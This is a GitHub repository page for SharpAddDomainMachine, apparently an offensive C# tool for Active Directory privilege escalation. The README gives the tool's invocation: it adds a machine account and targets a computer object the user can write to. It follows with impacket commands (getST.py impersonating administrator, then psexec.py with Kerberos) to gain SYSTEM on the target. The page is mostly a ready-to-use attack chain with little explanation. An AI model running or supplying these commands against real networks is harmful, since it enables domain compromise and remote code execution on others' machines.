Skip to content
SharpAddDomainMachine
C#
Branch: master
Clone or download

Latest commit

Fetching latest commit…
Cannot retrieve the latest commit at this time.

Files

Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.vs/SharpAddDomainMachine/v14
SharpAddDomainMachine
packages
README.md
SharpAddDomainMachine.sln

README.md

SharpAddDomainMachine

Description

The same script as SharpAllowedToAct, but more usefully for local privilege escalation.

Usage

SharpAddDomainMachine

SharpAddDomainMachine.exe domain=domain.com dc=192.168.1.1 tm=target_machine_name ma=machine_account mp=machine_pass

domain: Set the target domain.
dc:     Set the domain controller to use.
tm:     Set the name of the target computer you want to exploit. Need to have write access to the computer object.
ma:     Set the name of the new machine.(default:random)
mp:     Set the password for the new machine.(default:random)

After successful attack use impacket to get system:

getST.py -dc-ip dc_ip domain.com/ma:mp -spn cifs/tm.domain -impersonate administrator
export KRB5CCNAME=administrator.ccache
psexec.py domain/administrator@tm.domain -k -no-pass

exploit:

getsystem:

Rubeus example:

You can’t perform that action at this time.